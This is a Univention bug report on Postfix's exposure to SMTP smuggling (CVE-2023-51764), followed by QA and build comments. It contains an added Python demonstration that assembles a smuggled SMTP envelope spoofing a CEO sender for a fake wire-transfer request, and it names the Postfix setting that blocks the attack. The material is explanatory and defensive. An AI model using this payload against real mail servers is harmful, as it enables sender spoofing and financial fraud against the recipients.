Bug 56957 - SMTP Smuggling through Postfix
Status: CLOSED FIXED
Product: UCS
Classification: Unclassified
Component: Mail
Version: UCS 5.0
Hardware: Other Linux
Importance: P5 normal
Target Milestone: UCS 5.0-6-errata
Assigned To: Alexander Steffen
QA Contact: Tobias Wenzel
URL: https://git.knut.univention.de/univen...
Depends on:
Blocks: 56988
Reported: 2024-01-03 12:09 CET by Jan-Luca Kiok
Modified: 2024-01-17 13:43 CET
CC: 2 users

See Also:
What kind of report is it?: Security Issue
What type of bug is this?: ---
Who will be affected by this bug?: ---
How will those affected feel about the bug?: ---
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional):
Max CVSS v3 score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)


Attachments

Description Jan-Luca Kiok univentionstaff 2024-01-03 12:09:15 CET
Our Postfix version is affected by CVE-2023-51764: https://security-tracker.debian.org/tracker/CVE-2023-51764

In the current configuration it is possible to spoof MAIL FROM (and bypass SPF) by injecting a mail into another: https://www.postfix.org/smtp-smuggling.html

If I read that right, there is a fix available, so we should patch our Postfix versions in UCS 5 and possibly 4.4 and release it.
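The injection described in the report, as an added example that is not part of this bug or of Postfix: a byte-level Python model of why an end-of-data parser that accepts a bare-newline variant of <CR><LF>.<CR><LF> lets a second envelope with a spoofed MAIL FROM ride inside one DATA body. The addresses, message text and helper names (`split_data`, `parse_envelope`, `has_bare_newline`) are constructed for the demonstration; the set of lenient terminators modelled is an assumption.

```python
"""SMTP smuggling (CVE-2023-51764) modelled on the byte level.

Constructed demonstration, not Postfix code: a relay whose end-of-data
parser only accepts <CR><LF>.<CR><LF> forwards the attacker's DATA body
as ONE message, while an unpatched receiver that also accepts a
bare-LF variant (<LF>.<CR><LF>) ends the message early and reads the
rest as new SMTP commands, i.e. a second envelope with a spoofed
MAIL FROM. The addresses and message text below are made up.
"""

import re

STRICT_EOD = b"\r\n.\r\n"
# Lenient end-of-data: the RFC form plus bare-LF variants
# (assumption for this model: exactly these forms).
LENIENT_EOD_RE = re.compile(rb"(?:\r\n|\n)\.(?:\r\n|\n)")
# A bare <LF> is one not preceded by <CR>; this is what
# smtpd_forbid_bare_newline = yes rejects.
BARE_LF_RE = re.compile(rb"(?<!\r)\n")

# Second envelope the attacker wants the receiver to see (constructed).
SMUGGLED = (
    b"MAIL FROM:<ceo@victim.example>\r\n"
    b"RCPT TO:<cfo@victim.example>\r\n"
    b"DATA\r\n"
    b"From: ceo@victim.example\r\n"
    b"Subject: urgent wire transfer\r\n"
    b"\r\n"
    b"Please pay invoice 4711 today.\r\n"
)

# Bytes on the wire between relay and receiver: the attacker's DATA body,
# containing <LF>.<CR><LF>, followed by the relay's own real terminator.
WIRE = (
    b"From: attacker@evil.example\r\n"
    b"Subject: hello\r\n"
    b"\r\n"
    b"innocent text"
    b"\n.\r\n"          # bare-LF end-of-data, ignored by a strict parser
    + SMUGGLED
    + b".\r\n"          # completes "...today.\r\n.\r\n": the strict EOD
)


def split_data(stream: bytes, strict: bool):
    """Return (message, trailing): the body up to the first end-of-data
    sequence this parser recognises, and whatever follows it, which the
    receiver would then parse as further SMTP commands."""
    if strict:
        idx = stream.find(STRICT_EOD)
        if idx < 0:
            return stream, b""
        return stream[:idx], stream[idx + len(STRICT_EOD):]
    m = LENIENT_EOD_RE.search(stream)
    if m is None:
        return stream, b""
    return stream[: m.start()], stream[m.end():]


def parse_envelope(commands: bytes) -> dict:
    """Collect MAIL FROM / RCPT TO addresses from bytes interpreted as
    SMTP commands, stopping at DATA."""
    env = {"mail_from": [], "rcpt_to": []}
    for line in re.split(rb"\r?\n", commands):
        upper = line.upper()
        if upper.startswith(b"MAIL FROM:"):
            env["mail_from"].append(line[10:].strip(b"<> ").decode())
        elif upper.startswith(b"RCPT TO:"):
            env["rcpt_to"].append(line[8:].strip(b"<> ").decode())
        elif upper == b"DATA":
            break
    return env


def has_bare_newline(data: bytes) -> bool:
    """The check a fixed receiver applies to DATA: any <LF> not preceded
    by <CR> makes the message rejectable."""
    return BARE_LF_RE.search(data) is not None


def relay_view():
    """How the strict relay sees the stream: one message, nothing after."""
    return split_data(WIRE, strict=True)


def receiver_view():
    """How the lenient receiver sees it: a short message, then a smuggled
    envelope with a spoofed sender."""
    message, trailing = split_data(WIRE, strict=False)
    return message, parse_envelope(trailing)


if __name__ == "__main__":
    msg, rest = relay_view()
    print("relay: one message of %d bytes, %d trailing" % (len(msg), len(rest)))
    msg, env = receiver_view()
    print("receiver: first message ends after %r" % msg[-13:])
    print("receiver: smuggled envelope", env)
    print("bare newline present:", has_bare_newline(WIRE))
```

Run stand-alone, the relay reports a single message with nothing trailing, while the lenient receiver reports a second envelope from ceo@victim.example that SPF never saw. The Postfix fix the report refers to closes this on the receiving side by rejecting such input: `smtpd_forbid_bare_newline = yes` in main.cf, with `smtpd_forbid_bare_newline_exclusions = $mynetworks` for trusted clients that still send bare newlines.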
Comment 2 Jan-Luca Kiok univentionstaff 2024-01-05 10:37:24 CET
CVSS score provided by SUSE: https://www.suse.com/security/cve/CVE-2023-51764.html
Comment 3 Tobias Wenzel univentionstaff 2024-01-16 16:02:31 CET
QA:

- code changes OK
- changelog OK
- advisory OK
- manual OK

-> waiting for jenkins to set verified.
Comment 4 Tobias Wenzel univentionstaff 2024-01-17 09:14:22 CET
Package was built with

Package: univention-mail-postfix
Version: 14.0.7-1
Branch: ucs_5.0-0
Scope: errata5.0-6

-> jenkins jobs look good